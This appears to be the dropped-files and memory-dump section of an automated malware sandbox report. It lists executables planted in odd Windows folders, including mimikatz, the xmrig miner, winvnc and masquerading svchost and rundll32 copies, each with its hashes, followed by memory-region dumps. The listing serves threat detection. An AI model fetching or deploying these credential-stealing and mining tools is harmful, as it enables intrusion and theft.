5a21251624a7f4954410049f2d4ac9a52394181ee893d6bdfa6311249be38e9dbb0c382711a00d20aba20b9509f8880f821d88aa96c532ca61082ae5f68b2050

Download Submit
C:\Windows\System32\a\Fulloptionv2.exe

Filesize
5.7MB

MD5
100620cd1016f9b7aed030b8eced2afd

SHA1
f98f52d52fa58ea5d9b179d28422109958e1b3e2

SHA256
457a62394c53eba3c5ef6d569230487c17aaabc837a4a9361670b1c2ee9f5c34

SHA512
b092244989f027692ee5cc4475611469c8ead213dde075493a6f6a5d3b81371d428958617c58a6c16dbadf75cb878fe279c0140f1629a169392e5f14e6c0f08d

Download Submit
C:\Windows\System32\a\Office%202010%20Toolkit.exe

Filesize
35.6MB

MD5
fef5c779d0b44382ef8f073ba0bbf7bb

SHA1
011935d8adef3fdf141b3a593b85b1c10297b809

SHA256
073c6edb2faf295bec336a19396f2809d68a22f2fbf1e747617c4438eff6db45

SHA512
7b4c838190558520796907d915a696588ef5b9e5cd6a6781e5ab687af383fe8b0a87bd753c34f7d92c64ef1e35b7414a1a93519fcf8b59032980ae80265ec1e5

Download Submit
C:\Windows\System32\a\diskutil.exe

Filesize
3.2MB

MD5
64037f2d91fe82b3cf5300d6fa6d21c3

SHA1
61c8649b92fc06db644616af549ff5513f0f0a6d

SHA256
33aab91831bba3a5fea7f49da16d5506254d66377d3074ff9457af4220be670e

SHA512
2a70ef0c4d3a2237175078f0e84cd35d7d595422c3aa5219d6f0fe876f82cf60e1d4f592a58f166cf8175c52d275c21950c5ea421416fee8877dfaec5b9be008

Download Submit
C:\Windows\System32\a\final.exe

Filesize
217KB

MD5
b588b3f94591ffad45b2d809da200fbe

SHA1
e56e246e1cebcffcce9c0603ff616bd759cba403

SHA256
c7265f67b7e2a9697525cc6da6501fdaa8e9a4dadd6322619b7b0ca6a5f24150

SHA512
9fb0c574174749b6951a455483018a577bf12fd07dcdf40c76954a9a9f5d66bfa90d32dd6ecd54cf4d80dae1aa93419ddebbe5795eff21d57423096eb168b8a9

Download Submit
C:\Windows\System32\a\ghjaedjgaw.exe

Filesize
144KB

MD5
1d0fb45faa5b7a8b398703596d67c967

SHA1
b326e3801b56b5ed86ae66249e6ea64cdefa1997

SHA256
4e0453e61609c04bce1071d29f21abc82800e11261e284ca3250fd8655239456

SHA512
9fa97e8611fd837f0756a505b8615076187d77fcf8aa5ff802944879e9d4d19ebccaea394b0c4327748c73da6bfca8acba6cdf12c5992056a798f28c064e0a63

Download Submit
C:\Windows\System32\a\mimikatz.exe

Filesize
1.2MB

MD5
e930b05efe23891d19bc354a4209be3e

SHA1
d1f7832035c3e8a73cc78afd28cfd7f4cece6d20

SHA256
92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50

SHA512
a7a59176ca275d5d5ea6547108907bbe8ddbf3489308b3d6efe571b685de7e6263d36d6580abe9587a7f77adc22d3b7b164ad42845b6c110b794eaba7ab47ec6

Download Submit
C:\Windows\System32\a\systempreter.exe

Filesize
52KB

MD5
d07714b594ae5d7f674c7fcf6a803807

SHA1
938efbba8d8e34c2d1dcc0db37a84f887ae6724f

SHA256
ad8248e7dafb0a1b3d6c22dac544f0abcfab093a75561e534a473d46917f1d47

SHA512
487306ea6bdd7e247c9b194eae6d1e22fe898161f6417eb773c84144584cfb96c4d47d188f38a349cee7b13887f3fdf81b5542ac914cfe072beb564899553250

Download Submit
C:\Windows\System32\a\vc_redist.x64.exe

Filesize
13.9MB

MD5
27b141aacc2777a82bb3fa9f6e5e5c1c

SHA1
3155cb0f146b927fcc30647c1a904cd162548c8c

SHA256
5eea714e1f22f1875c1cb7b1738b0c0b1f02aec5ecb95f0fdb1c5171c6cd93a3

SHA512
7789eabb6dd4a159bb899d2e6d6df70addb3df239bda6f9ead8c1d2a2ac2062fce3a495814b48a3c2bec12f13800ad0703e2c61c35158b0912011b914f098011

Download Submit
C:\Windows\System32\a\win.exe

Filesize
36KB

MD5
1d286b861d4b283bb79330b61d18fc26

SHA1
ab6515e058793efbc59de100fed80d7a2714d205

SHA256
4cbc414d046f0cb106ec1cbc8753c47f5146a9942115324b80be4503ac98ff40

SHA512
0ada866040ce21e78732fa9a1aa9ed1e81f43e713fde38eae5c7034f9cda412a35bb7d8cae66829f42f3a4c0082722787e8f55f7155e9142d6ae3935acfad30b

Download Submit
C:\Windows\System32\a\winvnc.exe

Filesize
1.7MB

MD5
e0f5ea2b200ca1c5463e532d7cd18420

SHA1
4e192c88d50eae5cb809bd709dc41b091496c4ee

SHA256
122d26126466db404f2d5f1a6ed0e347fed81983cfa9a87039a95dc205770283

SHA512
4caae87208997c2b24315f529c683b01433d0ac2dbda5993f8db32727ce800efc14840660c2ae3898400d2f99d61266512e728f7cbe7360fceacd8b7d99c2fb4

Download Submit
C:\Windows\System32\a\xmrig.exe

Filesize
9.1MB

MD5
cb166d49ce846727ed70134b589b0142

SHA1
8f5e1c7792e9580f2b10d7bef6dc7e63ea044688

SHA256
49da580656e51214d59702a1d983eff143af3560a344f524fe86326c53fb5ddb

SHA512
a39bd86a148af26fd31a0d171078fb7bce0951bb8ea63658d87f6bde97dbc214c62e8bd7152d1e621051de8a0ba77ffd7bda7c1106afb740584c80e68e1912ed

Download Submit
C:\Windows\rundll32.exe

Filesize
37KB

MD5
4699bec8cd50aa7f2cecf0df8f0c26a0

SHA1
c7c6c85fc26189cf4c68d45b5f8009a7a456497d

SHA256
d6471589756f94a0908a7ec9f0e0e98149882ce6c1cf3da9852dc88fcc3d513d

SHA512
5701a107e8af1c89574274c8b585ddd87ae88332284fc18090bbcccf5d11b65486ccf70450d4451fec7c75474a62518dd3c5e2bedda98487085276ac51d7ac0e

Download Submit
\Users\Admin\AppData\Local\Temp\GSD604.tmp

Filesize
44KB

MD5
7d46ea623eba5073b7e3a2834fe58cc9

SHA1
29ad585cdf812c92a7f07ab2e124a0d2721fe727

SHA256
4ebf13835a117a2551d80352ca532f6596e6f2729e41b3de7015db558429dea5

SHA512
a1e5724d035debf31b1b1be45e3dc8432428b7893d2bfc8611571abbf3bcd9f08cb36f585671a8a2baa6bcf7f4b4fe39ba60417631897b4e4154561b396947ca

Download Submit
\Windows\SysWOW64\Files\XClient.exe

Filesize
39KB

MD5
93db28cf0c7dbc678c854f712719b16f

SHA1
434b3ac4527963101e720e2555570b95307da692

SHA256
b94b67c16df12216176e48ac4ad3b101cf087e0d2c2e4599b9439c41a0d0889e

SHA512
fecbfe7cd590f15d862a16d70c8712cb93a72e1bb9b8155577114b95ffca895876cc8013eeb2e90e130c86b1168f277aa28f275a21aca36c81650ca96afa1182

Download Submit
\Windows\SysWOW64\Files\lastest.exe

Filesize
37KB

MD5
d51ff4ddc2f854ca93e0f1d04b73f29e

SHA1
48c15d887fdb2b303def489c857db926cc4453ee

SHA256
b4805d9fa4ac2354f8819c739ddf7095c397e916b29468f065c0907394909fe5

SHA512
5103202e3357da07625653c74957b85949467a7b26506148981e3469ac0df6003e1823f7d66880da31bbc7edfb0e4d93aade6c9c989fb71fcfcac12e434562d4

Download Submit
\Windows\SysWOW64\Files\msgde.exe

Filesize
3.1MB

MD5
c9536d9bb5c51fe2741cbf206531c13b

SHA1
5e4e1d68dd06301cf7810fa04589917aadfefad7

SHA256
1dff2a45e9861cdcb8741dd196123e32e2b9004b950ee21b9bacc9f99be14fdc

SHA512
e3bd730edd61ef54180ca004947cdcd1de88756ecec7f7f46f0a66702e5f271243ff096b0dc3c1e93621948745374fe996704078a64d23a7d049f424e754f5f7

Download Submit
\Windows\SysWOW64\Files\sunset1.exe

Filesize
80KB

MD5
d4304bf0e2d870d9165b7a84f2b75870

SHA1
faba7be164ea0dbd4f51605dd4f22090df8a2fb4

SHA256
6fc5c0b09ee18143f0e7d17231f904a5b04a7bd2f5d3c2c7bfe1ef311f41a4d3

SHA512
2b81bcab92b949d800559df746958a04f45ae34c480747d20bd3d7c083ce6069076efe073db4618c107e8072a41f684ea5559f1d92052fd6e4c523137e59e8d7

Download Submit
\Windows\SysWOW64\Files\svchost.exe

Filesize
69KB

MD5
35de149d3c81727ea4cce81a09f08581

SHA1
dfa61238834b2f689822ece4f3b9f3c04f46cd0a

SHA256
1803c1f48e626b2ec0e2620649d818ebf546bfe58dffddfbad224f20a8106ba0

SHA512
dc7986c5849b6aa21ce27f0dac697f2a9d069fcd3652f1a50d1d50ab06985b6ea436458cc63dd16d7030be75db7e20c84e62bd05062b06a5ec18e2fca2b50152

Download Submit
\Windows\System32\a\Google%20Chrome.exe

Filesize
290KB

MD5
e2fc79e82bf7dfbd4e2530ee8ca46140

SHA1
39c8273b7e92609b17682332c37f7125c381e6a3

SHA256
4193ffa8e68aed55ba840e779dc1d69ac43df10b5a8128d45dcbd55b40523a4b

SHA512
c83ff85f0b986253721653183feb7f6060b32bc0ba6db82192067a8966378420c3312d69e732c1ad0a5357d6cacb97f5c0689810518ba35571decdfec04dde1c

Download Submit
memory/376-1884-0x000000013F340000-0x000000013F749000-memory.dmp

Filesize
4.0MB

Download
memory/376-1887-0x000000013F340000-0x000000013F749000-memory.dmp

Filesize
4.0MB

Download
memory/568-308-0x000000001B570000-0x000000001B852000-memory.dmp

Filesize
2.9MB

Download
memory/568-309-0x0000000001F00000-0x0000000001F08000-memory.dmp

Filesize
32KB

Download
memory/844-2046-0x00000000002B0000-0x0000000000BF4000-memory.dmp

Filesize
9.3MB

Download
memory/932-1523-0x000000001B4A0000-0x000000001B782000-memory.dmp

Filesize
2.9MB

Download
memory/1208-751-0x0000000000400000-0x0000000000639000-memory.dmp

Filesize
2.2MB

Download
memory/1208-551-0x0000000000400000-0x0000000000639000-memory.dmp

Filesize
2.2MB

Download
memory/1328-1848-0x00000000010D0000-0x00000000014CE000-memory.dmp

Filesize
4.0MB

Download
memory/1560-1437-0x0000000000210000-0x00000000003A6000-memory.dmp

Filesize
1.6MB

Download
memory/1560-1439-0x0000000000210000-0x00000000003A6000-memory.dmp

Filesize
1.6MB

Download
memory/1560-1457-0x0000000000210000-0x00000000003A6000-memory.dmp

Filesize
1.6MB

Download
memory/1560-1434-0x0000000000210000-0x00000000003A6000-memory.dmp

Filesize
1.6MB

Download
memory/1584-472-0x000000013FE50000-0x0000000140A84000-memory.dmp

Filesize
12.2MB

Download
memory/1652-459-0x0000000000110000-0x0000000000128000-memory.dmp

Filesize
96KB

Download
memory/1808-1755-0x0000000000DB0000-0x00000000010D4000-memory.dmp

Filesize
3.1MB

Download
memory/1860-1762-0x00000000028A0000-0x00000000028A8000-memory.dmp

Filesize
32KB

Download
memory/1876-303-0x00000000013B0000-0x00000000013C0000-memory.dmp

Filesize
64KB

Download
memory/1896-933-0x0000000000AA0000-0x0000000000E5E000-memory.dmp

Filesize
3.7MB

Download
memory/1896-971-0x0000000000AA0000-0x0000000000E5E000-memory.dmp

Filesize
3.7MB

Download
memory/1928-1839-0x0000000000FE0000-0x0000000001DEE000-memory.dmp

Filesize
14.1MB

Download
memory/1964-970-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download
memory/1964-907-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download
memory/2020-539-0x0000000000A40000-0x0000000000D72000-memory.dmp

Filesize
3.2MB

Download
memory/2032-1530-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2032-1534-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2032-1529-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2032-1528-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2032-1527-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2032-1532-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2084-2035-0x0000000000160000-0x000000000062A000-memory.dmp

Filesize
4.8MB

Download
memory/2164-1365-0x00000000002C0000-0x000000000030B000-memory.dmp

Filesize
300KB

Download
memory/2164-1371-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/2180-315-0x000000001B490000-0x000000001B772000-memory.dmp

Filesize
2.9MB

Download
memory/2180-316-0x00000000028F0000-0x00000000028F8000-memory.dmp

Filesize
32KB

Download
memory/2212-993-0x0000000000ED0000-0x00000000020BA000-memory.dmp

Filesize
17.9MB

Download
memory/2264-1951-0x00000000000D0000-0x000000000014A000-memory.dmp

Filesize
488KB

Download
memory/2280-1833-0x0000000000B10000-0x0000000000F22000-memory.dmp

Filesize
4.1MB

Download
memory/2352-901-0x0000000000AE0000-0x0000000000AF2000-memory.dmp

Filesize
72KB

Download
memory/2452-1954-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2452-1888-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2452-1889-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2452-1955-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2484-1750-0x00000000078C0000-0x00000000087DF000-memory.dmp

Filesize
15.1MB

Download
memory/2484-932-0x0000000007640000-0x00000000079FE000-memory.dmp

Filesize
3.7MB

Download
memory/2484-2-0x00000000000E0000-0x00000000000E8000-memory.dmp

Filesize
32KB

Download
memory/2484-1747-0x00000000078C0000-0x00000000087DF000-memory.dmp

Filesize
15.1MB

Download
memory/2484-972-0x0000000007640000-0x00000000079FE000-memory.dmp

Filesize
3.7MB

Download
memory/2484-931-0x0000000007640000-0x00000000079FE000-memory.dmp

Filesize
3.7MB

Download
memory/2484-1679-0x00000000078C0000-0x00000000087DF000-memory.dmp

Filesize
15.1MB

Download
memory/2484-1680-0x00000000078C0000-0x00000000087DF000-memory.dmp

Filesize
15.1MB

Download
memory/2484-905-0x00000000042A0000-0x0000000004300000-memory.dmp

Filesize
384KB

Download
memory/2492-1899-0x000000013F340000-0x000000013F749000-memory.dmp

Filesize
4.0MB

Download
memory/2492-1881-0x000000013F340000-0x000000013F749000-memory.dmp

Filesize
4.0MB

Download
memory/2492-57-0x0000000000300000-0x0000000000308000-memory.dmp

Filesize
32KB

Download
memory/2572-1551-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2572-1544-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2572-1550-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2572-1538-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2572-1546-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2572-1542-0x0000000000180000-0x00000000001A0000-memory.dmp

Filesize
128KB

Download
memory/2572-1543-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2572-1535-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2572-1536-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2572-1541-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2572-1540-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2572-1545-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2572-1547-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2572-1539-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2572-1537-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2620-1825-0x0000000000CA0000-0x0000000001AC2000-memory.dmp

Filesize
14.1MB

Download
memory/2636-1769-0x000000013F700000-0x000000014061F000-memory.dmp

Filesize
15.1MB

Download
memory/2636-1794-0x000000013F700000-0x000000014061F000-memory.dmp

Filesize
15.1MB

Download
memory/2636-1768-0x000000013F700000-0x000000014061F000-memory.dmp

Filesize
15.1MB

Download
memory/2652-228-0x00000000013C0000-0x00000000016E4000-memory.dmp

Filesize
3.1MB

Download
memory/2660-1496-0x000007FEEB060000-0x000007FEEB648000-memory.dmp

Filesize
5.9MB

Download
memory/2824-198-0x0000000000DC0000-0x0000000000E0E000-memory.dmp

Filesize
312KB

Download
memory/2876-2228-0x0000000000C30000-0x0000000000F56000-memory.dmp

Filesize
3.1MB

Download
memory/2892-217-0x0000000000220000-0x000000000023C000-memory.dmp

Filesize
112KB

Download
memory/2892-287-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2892-216-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2936-1756-0x000000013F470000-0x000000014038F000-memory.dmp

Filesize
15.1MB

Download
memory/2936-1683-0x000000013F470000-0x000000014038F000-memory.dmp

Filesize
15.1MB

Download
memory/2936-1681-0x000000013F470000-0x000000014038F000-memory.dmp

Filesize
15.1MB

Download
memory/2936-1684-0x000000013F470000-0x000000014038F000-memory.dmp

Filesize
15.1MB

Download
memory/2936-1682-0x000000013F470000-0x000000014038F000-memory.dmp

Filesize
15.1MB

Download
memory/2936-1757-0x000000013F470000-0x000000014038F000-memory.dmp

Filesize
15.1MB

Download
memory/2936-1766-0x000000013F470000-0x000000014038F000-memory.dmp

Filesize
15.1MB

Download
memory/2948-832-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2948-842-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2948-833-0x0000000000220000-0x000000000023C000-memory.dmp

Filesize
112KB

Download
memory/2952-555-0x0000000000380000-0x00000000006B2000-memory.dmp

Filesize
3.2MB

Download
memory/3044-1525-0x0000000019F00000-0x000000001A1E2000-memory.dmp

Filesize
2.9MB

Download
memory/3044-1526-0x0000000000B20000-0x0000000000B28000-memory.dmp

Filesize
32KB

Download